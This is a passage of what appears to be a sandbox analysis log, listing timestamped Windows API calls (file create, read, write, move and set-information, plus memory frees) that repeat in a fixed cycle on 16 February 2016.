{"category": "filesystem", "timestamp": "2016-02-16 17:41:41,131", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,141", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,141", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,141", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,141", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,141", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,141", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,141", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,141", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,151", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,151", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,151", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,151", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,151", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,161", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,161", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,161", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,161", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,161", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,161", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,161", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,161", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,171", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,171", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,171", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,171", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,171", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,171", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,171", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,181", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,181", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,181", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,181", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,181", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,181", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,181", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,191", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,191", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,191", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,191", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,191", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,191", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,191", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,201", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,201", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,201", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,201", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,201", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,201", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,201", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,201", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,211", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,211", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,211", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,211", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,211", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,211", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,211", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,211", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,221", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,221", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,221", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,221", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,221", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,221", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,221", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,221", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,221", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,231", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,231", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,231", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,231", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,231", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,231", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,231", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,241", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,241", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,241", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,241", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,241", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,241", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,251", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,251", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,251", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,251", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,251", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,251", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,261", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,271", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,271", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,271", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,271", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,271", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,271", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,282", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,292", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,302", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,302", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,312", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,312", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,312", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,312", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,312", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,312", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,322", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,322", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,322", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,322", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,322", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,322", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,322", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,322", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,322", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,322", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,332", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,332", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,332", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,332", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,332", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,332", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,332", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,332", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,332", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,342", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,342", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,342", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,352", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,352", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,352", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,352", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,362", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,402", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,402", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,402", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,402", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,402", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,412", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,412", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,412", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,412", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,422", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,422", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,422", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,422", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,422", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,422", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,432", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,432", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,432", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,432", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,432", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,432", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,432", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,432", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,442", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,442", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,442", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,442", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,442", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,452", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,452", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,452", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,452", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,452", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,452", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,452", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,462", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,462", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,462", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,462", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,472", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,472", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,472", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,472", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,472", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,472", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,472", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,472", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,472", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,482", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,482", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,492", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,492", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,492", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,492", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,492", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,492", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,492", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,502", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,502", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,512", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,512", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,522", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,522", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,522", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,522", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,522", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,522", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,522", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,522", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,522", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,522", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,532", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,532", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,532", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,532", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,532", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,532", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,532", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,532", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,542", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,542", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,552", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,552", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,552", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,562", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,562", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,562", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,562", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,562", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,562", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,562", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,562", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,562", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,572", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,572", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,582", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,582", "api": "NtCreateFile"}, {"category": "filesystem", 